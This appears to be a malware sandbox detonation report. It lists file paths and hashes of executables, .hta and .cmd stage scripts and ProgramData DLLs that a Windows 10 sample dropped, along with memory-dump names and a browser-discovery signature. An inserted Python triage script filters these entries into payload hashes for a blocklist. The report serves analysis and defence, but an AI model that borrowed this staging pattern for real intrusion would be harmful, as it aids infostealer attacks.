memory/836-29-0x0000000001000000-0x0000000001304000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe
| MD5 | 977cb8c87f5af026b73fde1dc4b75a0e |
| SHA1 | 8b5bb58ca523b459afbb469bc1fedc0aebb1155f |
| SHA256 | 1e068af2dd82efea11c6eaffb036901f5653fd63133ca8e99ff3e62d7dd403a2 |
| SHA512 | 43145a48cbf389fd96c386a3fdb238b2105a6b629284802ccc4b4029bc9e1e6d1d9d031c6452ae9f26f3b19db97ee0fe400a6d28135c2bd4f1378b1e8ab69f5e |
memory/5004-33-0x0000000000FB0000-0x0000000001659000-memory.dmp
memory/5004-34-0x0000000061E00000-0x0000000061EF3000-memory.dmp
\??\pipe\crashpad_1640_DYWSSOXQTXGGJLPE
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\scoped_dir1640_786189774\9f45fb85-752d-4998-a72d-bbb72b3b408f.tmp
| MD5 | eae462c55eba847a1a8b58e58976b253 |
| SHA1 | 4d7c9d59d6ae64eb852bd60b48c161125c820673 |
| SHA256 | ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad |
| SHA512 | 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3 |
C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
| MD5 | 139801ec12921d4a10cade0e8bd14581 |
| SHA1 | 19e4ea0a6204a9256bb2671aec86b1942d0bb63c |
| SHA256 | 8a32ddf6678734e654e2c128673789991b08f31d4c0049f168774f0b056a2796 |
| SHA512 | 2d6c0a6923b278d648b20f3091cabdf889f5ae7e767675c8eb93fb23f607b1e6cb8ea891bf827932efa78dddddb32671045d2e52adac73ff764c7286bc542601 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir1640_786189774\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 558659936250e03cc14b60ebf648aa09 |
| SHA1 | 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825 |
| SHA256 | 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b |
| SHA512 | 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
memory/5452-482-0x0000000001540000-0x000000000159F000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | b6aa6f6737aea3db522b6254253be4c9 |
| SHA1 | adffd4e197b73b11710998acaae4a81df6f5d360 |
| SHA256 | eda45c4be63db8e549ec6b8768640e572bdcc7a57572bc41fba3b81485e06f2f |
| SHA512 | 6c4ff486b7107a426710917249b969948c7d57d60d6569aed03bd12f6f68387a98fec5c945f0620a90fe1b78f97b8442267b3b4708777f579a92a2d7420a082f |
memory/5004-493-0x0000000000FB0000-0x0000000001659000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0621e31d12b6e16ab28de3e74462a4ce |
| SHA1 | 0af6f056aff6edbbc961676656d8045cbe1be12b |
| SHA256 | 1fd3365fdb49f26471ce9e348ce54c9bc7b66230118302b32074029d88fb6030 |
| SHA512 | bf0aa5b97023e19013d01abd3387d074cdd5b57f98ec4b0241058b39f9255a7bbab296dce8617f3368601a3d751a6a66dc207d8dd3fc1cba9cac5f98e3127f6f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\fc049f7a-1008-4e4e-90cb-9c0b9dd0f7b7.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 173d575d8212fda39e25ebe601791d36 |
| SHA1 | b6cd1c8c12dcb22b6089175439b834338b92c59b |
| SHA256 | 43126a5b2e47220954a9ea8abcf768e3f38d165bceafe8b15d86e08e7d1af77c |
| SHA512 | 046192919c18a56930ccb2398d7c7106eddb0472149cb1ab4eb61ffe1c8b62c7bf012f08b6ac8eecfefe1a0ab807546bea5a6f90f0873440c17189a0438af767 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56361f50f0ee63ef0ea7c91d0c8b847a |
| SHA1 | 35227c31259df7a652efb6486b2251c4ee4b43fc |
| SHA256 | 7660beecfee70d695225795558f521c3fb2b01571c224b373d202760b02055c0 |
| SHA512 | 94582035220d2a78dfea9dd3377bec3f4a1a1c82255b3b74f4e313f56eb2f7b089e36af9fceea9aa83b7c81432622c3c7f900008a1bdb6b1cd12c4073ae4b8a2 |
C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe
| MD5 | 454bd2cde5257315f133cfc64bcd0351 |
| SHA1 | ccfb541cc802100b3d0bc4c4147bf0363675be2b |
| SHA256 | 61a5dd7249aa43b42abc2ce22d7937dc68c7c3748d20784cb86dd7135080d580 |
| SHA512 | da676aed2ed94912d7a8d84c670d6c49a91a3bd932cf88bfa141e8db16c358c64ecaa561ca34f53f9ead0e4fdbdd534aa380edba700f2582c9606a4ab270838f |
C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta
| MD5 | 57206b089ec9eb7b8306dbb5103d7a1f |
| SHA1 | 40996be44267e881e6d90db8943c180c5cd713c9 |
| SHA256 | 2cbf10cb52bf94396760b3d29608b6279d679de0fae37a74eedf16acccb92e32 |
| SHA512 | f91926d2c8986d20a4de61c2dc592d4d3b062611e828fc40c33321ac2254ba780ff3a441acb1aefbb85e48ca248d3075e94dfd3973c6a721e0a75a4a6261d709 |
memory/6128-577-0x00000000051F0000-0x0000000005226000-memory.dmp
memory/6128-578-0x0000000005910000-0x0000000005F38000-memory.dmp
memory/6128-579-0x0000000005820000-0x0000000005842000-memory.dmp
memory/6128-580-0x00000000060B0000-0x0000000006116000-memory.dmp
memory/6128-581-0x0000000006130000-0x0000000006196000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eb1ze1h5.ul1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/6128-591-0x00000000061C0000-0x0000000006514000-memory.dmp
memory/6128-592-0x00000000067C0000-0x00000000067DE000-memory.dmp
memory/6128-593-0x0000000006800000-0x000000000684C000-memory.dmp
memory/6128-594-0x0000000007EF0000-0x000000000856A000-memory.dmp
memory/6128-595-0x0000000006CD0000-0x0000000006CEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
memory/6128-604-0x0000000007CD0000-0x0000000007D66000-memory.dmp
memory/6128-605-0x0000000007C30000-0x0000000007C52000-memory.dmp
memory/6128-608-0x0000000008B20000-0x00000000090C4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d17294f0-6b51-480e-b0d5-12ec554289c7.dmp
| MD5 | 458298981f53ea4a9ce016a0e78b87fb |
| SHA1 | 6e69ac9cb3033f22d080d528f5cfa753b61afb57 |
| SHA256 | 66e4f516c5a09bfd0409cf31a4c1d52882570a934569ab908f47fdd7fa5e0cda |
| SHA512 | 2a325e17f95973622f32e2a1c52bb86bec03a653f4410aef84ab4cb14dd3cd09ae4f596abb52a36c4aca168a338d0ca3ea27b370bf5148fbbef05db8fb8bab16 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 25604a2821749d30ca35877a7669dff9 |
| SHA1 | 49c624275363c7b6768452db6868f8100aa967be |
| SHA256 | 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476 |
| SHA512 | 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5 |
memory/5912-668-0x0000000006430000-0x0000000006784000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 319d73b74a9aaa68b262bdba602a4f50 |
| SHA1 | 99c445eb03be34c8a4fb5d06a5451d458b81684d |
| SHA256 | 05fa07c6d7b8bd1c1d48d4cd1a02989fd6e632ba236543b94182387bcb87329a |
| SHA512 | 2a0b8b866f709b8c231d393e3e779bb9d177f6cbefd7e530b22343472eeb1ce28f34080d3508f5f8769833728aceffd823d15d0c74d25a1eafdfe35905173882 |
memory/5912-670-0x0000000006ED0000-0x0000000006F1C000-memory.dmp
memory/5004-677-0x0000000000FB0000-0x0000000001659000-memory.dmp
memory/5152-692-0x0000000005F90000-0x00000000062E4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 490fd2ec21839c825ef2589f3046770e |
| SHA1 | 0cf6253cce81fceac60204348e7e7dc4476496f4 |
| SHA256 | eaaf2ecbe65933eebb12e2e8642de68ca1f55283e030e1f4a03bb6c4c0ea016f |
| SHA512 | 30295e03ea9ecc33a841e249e0776d75047af56af6411e30ba2e47c60989c7af43c6a512931a67b4a6a3de4e716ca9868bbec740aa856c261b4b41a4bc75af26 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e8f28a867f91d49628e19714ced3af6b |
| SHA1 | 7849284287c46066648ddbfd1aaee4f508223ed5 |
| SHA256 | e1fbc0d8b7ab330a9e29ea7d4719df2a72519c5fcd2a51ecad267c2411704a45 |
| SHA512 | 1c461745ae531e01ca8e87e9babda63991aefdf5e7db8de12224bf0d287ef14a5c1a7157373cf595bead9b966cd1e718896ea3e8f3254c88025d9c59f4dd257f |
C:\Temp\ILvKar5Uh.hta
| MD5 | 16d76e35baeb05bc069a12dce9da83f9 |
| SHA1 | f419fd74265369666595c7ce7823ef75b40b2768 |
| SHA256 | 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7 |
| SHA512 | 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e |
memory/5596-720-0x0000000005B20000-0x0000000005E74000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 369745d53108fc6148c8607855ecc862 |
| SHA1 | 85d431ed5dfbbc47b470d7a2d0d41057b6c09149 |
| SHA256 | a6a57238c42dfefc32b78cbd286ba7181150edf53eb00fb5e2f0141d4cd38bc5 |
| SHA512 | 08f28f5fb35f1e17c73ae07eaed4c00b1bf0c8a3b32b965d488c8b2f7455cd39477b681f55fa5b6ca2ca6eabf0ece178bb0120f57c1e375c6d0d622a2eab4fc7 |
memory/5596-731-0x00000000061E0000-0x000000000622C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe
| MD5 | 4c3d80aa96c22ae2f7b01a904aef5ba0 |
| SHA1 | 5a4fe29daf45ada28b3a03a8284dcd098d935942 |
| SHA256 | 67ff99a32813cf55f119ca58c82c508a4d2d4e535fcc653fda16df801681299f |
| SHA512 | a372cb16a04d2540802ebcfb70c731097c44ae0b9e09d7b161fda8b73d4d4b11194de0c8cb60b2d05a86140b9f4d8258125564678574fa0182e944b5ac93d204 |
memory/5012-739-0x0000000000090000-0x000000000056E000-memory.dmp
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
memory/4920-772-0x0000000000460000-0x000000000093E000-memory.dmp
memory/5012-771-0x0000000000090000-0x000000000056E000-memory.dmp
memory/5004-788-0x0000000000FB0000-0x0000000001659000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe
| MD5 | b5001d168ba5139846f2848c8e05a6ee |
| SHA1 | 080f353ab857f04ea65b78570bfa998d1e421ea2 |
| SHA256 | 059e600a06b4b6671fa440728b932adff7d246441bf328fcc4a8e29d4df11a23 |
| SHA512 | d608f6f4ed7de73308ab7b231b343d5a832b2c0a68b0d0522d2df4c4a8cc15e12685b2ffcb8232b58b4c519979e4307179964fa4011752288f63f72090828143 |
memory/5960-803-0x0000000000400000-0x000000000087F000-memory.dmp
memory/4920-806-0x0000000000460000-0x000000000093E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe
| MD5 | 709f20db77537abb6cde29f2fbd767dc |
| SHA1 | a93fb22a5f9f95fd6342c707488b6fe591a63c2e |
| SHA256 | 4c10dc8445aba26985e3a84dcc33ba1b2dc3b724e21993b82b6c8dbc8f9431a7 |
| SHA512 | dd42980454db014a6eafd078ba3b7c5f4b6b38b5339c512bb25048a27064cf55665868a61890829f446db23869713467bd5110f12008d7363c2537e0d54df21c |
memory/4920-814-0x0000000000460000-0x000000000093E000-memory.dmp
memory/5212-822-0x0000000000760000-0x000000000117F000-memory.dmp
memory/5960-823-0x0000000000400000-0x000000000087F000-memory.dmp
memory/5960-824-0x0000000000400000-0x000000000087F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe
| MD5 | c217106f24ae6e1832d8380cbe1d87e0 |
| SHA1 | e805de3353dd76d659999f486b23968babae3c7b |
| SHA256 | bba85826623aa30104d734a17eaf97d6714f80d139ff628152e3371a86209b8b |
| SHA512 | 913122846a882246801ad953484b20d1cdf40a9056b03da1a438c78a670b2dbf37876a6d8eef14104f9d60e9e875556ae41f85300bf90a722b1cc0138103bcdb |
memory/8-839-0x0000000000C20000-0x0000000000F34000-memory.dmp
memory/5212-838-0x0000000000760000-0x000000000117F000-memory.dmp
memory/4920-841-0x0000000000460000-0x000000000093E000-memory.dmp
memory/5212-842-0x0000000000760000-0x000000000117F000-memory.dmp
memory/8-843-0x0000000000C20000-0x0000000000F34000-memory.dmp
memory/3840-844-0x0000000000310000-0x000000000033F000-memory.dmp
memory/3840-845-0x0000000000310000-0x000000000033F000-memory.dmp
memory/3840-851-0x0000000000310000-0x000000000033F000-memory.dmp
memory/5212-852-0x0000000000760000-0x000000000117F000-memory.dmp
memory/3840-850-0x0000000000310000-0x000000000033F000-memory.dmp
memory/3840-856-0x0000000010000000-0x000000001001C000-memory.dmp
memory/5960-860-0x0000000000400000-0x000000000087F000-memory.dmp
memory/4920-862-0x0000000000460000-0x000000000093E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe
| MD5 | bd6938a3e6bfd792f546742d669b6157 |
| SHA1 | 9a69167c0d4d32ef6660faaa8ef6244ace7b29d9 |
| SHA256 | 0c5789417d3d30ec72050cd456c8d46e5239ec9744f3db60fcc25e3725dc4228 |
| SHA512 | 2fc768ff242ce51743c2ad9988f3e82bf8211d27926a8b134b3a938fcbe23c64c837668e9744ef450e663719972bd864e3d28e614403c97746172e4bc6f627ed |
memory/2720-878-0x0000000000950000-0x0000000001586000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2M2U60MP\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe
| MD5 | 91a6449e2fb889d229d9752ca2f836e9 |
| SHA1 | c2da050d1d736d6e59a0ea171cf8fa26392c74b4 |
| SHA256 | b122069004430dbae554686cb36cf3b954638639c197f6a10168d4e62d33cc0a |
| SHA512 | ba553c9320b28bd37da75ce177e8292aecb789d7801a193ce941bf93350e7e13636e87d53f426b4755203a6a9da9584e203405fe0b00540dd3f0dde415571a02 |
memory/1608-896-0x00000000001F0000-0x000000000069F000-memory.dmp
memory/5960-895-0x0000000000400000-0x000000000087F000-memory.dmp
memory/4920-899-0x0000000000460000-0x000000000093E000-memory.dmp
memory/2720-901-0x0000000000950000-0x0000000001586000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe
| MD5 | 60dd2030e1ff1f9a3406ddc438893694 |
| SHA1 | b01f2c39b1046bc892c9db78898e1c063b21836f |
| SHA256 | d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee |
| SHA512 | 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246 |
memory/2236-919-0x00000000007B0000-0x000000000080C000-memory.dmp
memory/4512-921-0x0000000000400000-0x000000000045E000-memory.dmp
memory/4512-922-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2720-923-0x0000000000950000-0x0000000001586000-memory.dmp
memory/1608-926-0x00000000001F0000-0x000000000069F000-memory.dmp
memory/3904-928-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2720-931-0x0000000000950000-0x0000000001586000-memory.dmp
memory/3904-930-0x0000000000400000-0x000000000042F000-memory.dmp
memory/5828-940-0x0000000000400000-0x000000000087F000-memory.dmp
memory/3620-943-0x0000000000460000-0x000000000093E000-memory.dmp
memory/5960-942-0x0000000000400000-0x000000000087F000-memory.dmp
memory/3620-944-0x0000000000460000-0x000000000093E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe
| MD5 | 2b741a75b579116ba997b79d237139c2 |
| SHA1 | 33a80223e48874ce5959606fda6e7435cb15e035 |
| SHA256 | 246d7a524148b39f881eb6dfa3a9b6a2696781564fdaac5f81eb42e052fd6c44 |
| SHA512 | a98d667703d7f9e070597ea078676815da588e150c7d70f604e59303f8a44763ef976a1e72dbd4a91d135b96ca7536dbcc6e78e12cfe27d7ce1937fbdf954a38 |
memory/4920-958-0x0000000000460000-0x000000000093E000-memory.dmp
memory/5728-959-0x0000000000570000-0x000000000087C000-memory.dmp
memory/5728-968-0x0000000000570000-0x000000000087C000-memory.dmp
memory/1968-985-0x0000000000990000-0x00000000009EF000-memory.dmp
memory/5828-990-0x0000000000400000-0x000000000087F000-memory.dmp
memory/5960-1004-0x0000000000400000-0x000000000087F000-memory.dmp
memory/5828-1005-0x0000000000400000-0x000000000087F000-memory.dmp
memory/4920-1007-0x0000000000460000-0x000000000093E000-memory.dmp
memory/5960-1015-0x0000000000400000-0x000000000087F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\AVTX7ZEV\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
memory/5308-1030-0x0000000000460000-0x000000000093E000-memory.dmp
memory/5308-1032-0x0000000000460000-0x000000000093E000-memory.dmp
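The Files block above lists every file the sandbox saw written, so dropped payloads sit next to Chrome and Edge profile housekeeping, PowerShell startup caches, zero-byte named pipes and memory dumps. The script below is an added triage example, not code from the report or the sandbox: it parses the block's layout (a path line followed by `| MD5 | ... |` rows, with `memory/<pid>-<seq>-<start>-<end>-memory.dmp` names interleaved), drops entries that are known housekeeping, keeps executable and script drops as payload candidates, and groups the memory dumps by PID with the region size. The layout is taken from the page; the empty-file MD5 is a known constant; the `NOISE` path list and `PAYLOAD_EXT` set are the author's heuristics. The sample entries are copied from the block above.

```python
"""Reduce a sandbox 'Files' block to payload candidates and memory regions.

Added example, not part of the original report. The block layout is taken
from the page; NOISE and PAYLOAD_EXT are the author's own triage rules.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: entries copied from the report's Files block.
SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
| MD5 | 30e223a129babc795c38e7b6bb3ee202 |
| SHA1 | 99ac334d2de4224b19212f16922babfc0b424d92 |
| SHA256 | a971b93985a01d792963c3a7635eb2905487ba7dcf2623a4361907e1e82dcafe |
memory/836-28-0x0000000001000000-0x0000000001304000-memory.dmp
\??\pipe\crashpad_1640_DYWSSOXQTXGGJLPE
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta
| MD5 | 57206b089ec9eb7b8306dbb5103d7a1f |
| SHA256 | 2cbf10cb52bf94396760b3d29608b6279d679de0fae37a74eedf16acccb92e32 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eb1ze1h5.ul1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 319d73b74a9aaa68b262bdba602a4f50 |
| SHA256 | 05fa07c6d7b8bd1c1d48d4cd1a02989fd6e632ba236543b94182387bcb87329a |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
memory/5012-739-0x0000000000090000-0x000000000056E000-memory.dmp
"""

EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"   # MD5 of a zero-byte file
# Assumption: extensions worth treating as a dropped payload.
PAYLOAD_EXT = (".exe", ".dll", ".hta", ".cmd", ".bat", ".ps1", ".vbs", ".js")
# Assumption: path fragments that are browser/PowerShell housekeeping, not drops.
NOISE = (
    r"\Google\Chrome\User Data",
    r"\Microsoft\Edge\User Data",
    r"\PowerShell\StartupProfileData",
    r"\CLR_v4.0_32\UsageLogs",
    r"\__PSScriptPolicyTest_",
    r"\INetCache",
)
_DUMP = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp")


@dataclass
class FileEntry:
    path: str
    hashes: dict = field(default_factory=dict)   # algorithm name -> hex digest

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1]

    def is_noise(self) -> bool:
        low = self.path.lower()
        return (self.hashes.get("MD5") == EMPTY_MD5
                or any(n.lower() in low for n in NOISE))

    def is_payload(self) -> bool:
        return not self.is_noise() and self.name.lower().endswith(PAYLOAD_EXT)


def parse_files(text):
    """Return (entries, dumps): FileEntry list and (pid, start, end) tuples."""
    entries, dumps, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _DUMP.fullmatch(line)
        if m:
            pid, _seq, start, end = m.groups()
            dumps.append((int(pid), int(start, 16), int(end, 16)))
        elif line.startswith("|"):
            cells = [c.strip() for c in line.strip("|").split("|")]
            if current is not None and len(cells) == 2:
                current.hashes[cells[0].upper()] = cells[1].lower()
        else:
            current = FileEntry(line)          # any other line starts a new entry
            entries.append(current)
    return entries, dumps


def payload_candidates(text):
    entries, _ = parse_files(text)
    return [e for e in entries if e.is_payload()]


def sha256_set(text):
    """Deduplicated SHA256 list of the payload candidates, for a blocklist."""
    return sorted({e.hashes["SHA256"] for e in payload_candidates(text)
                   if "SHA256" in e.hashes})


def dumps_by_pid(text):
    """PID -> list of (base address, region size) from the memory dump names."""
    _, dumps = parse_files(text)
    out = {}
    for pid, start, end in dumps:
        out.setdefault(pid, []).append((start, end - start))
    return out


if __name__ == "__main__":
    for e in payload_candidates(SAMPLE_FILES):
        print(f"{e.hashes.get('SHA256', '?')}  {e.path}")
    for pid, regions in dumps_by_pid(SAMPLE_FILES).items():
        print(pid, [f"0x{b:x}+0x{s:x}" for b, s in regions])
```

Two caveats when using the result. First, the `.hta`, `.cmd` and `.ps1` drops are stage scripts and are more useful as content to read than as hashes to block, since they are regenerated per campaign; the `10035xxxxxxx` and `IXP00x.TMP` executables are the hash IOCs. Second, nss3.dll and mozglue.dll are Mozilla's NSS libraries: they pass the filter because they were dropped into C:\ProgramData, which is worth noticing, but their hashes identify legitimate Mozilla code rather than the malware and belong in a "tooling dropped" note, not on a blocklist.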
Analysis: behavioral10
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
139s
Command Line
Signatures
Browser Information Discovery
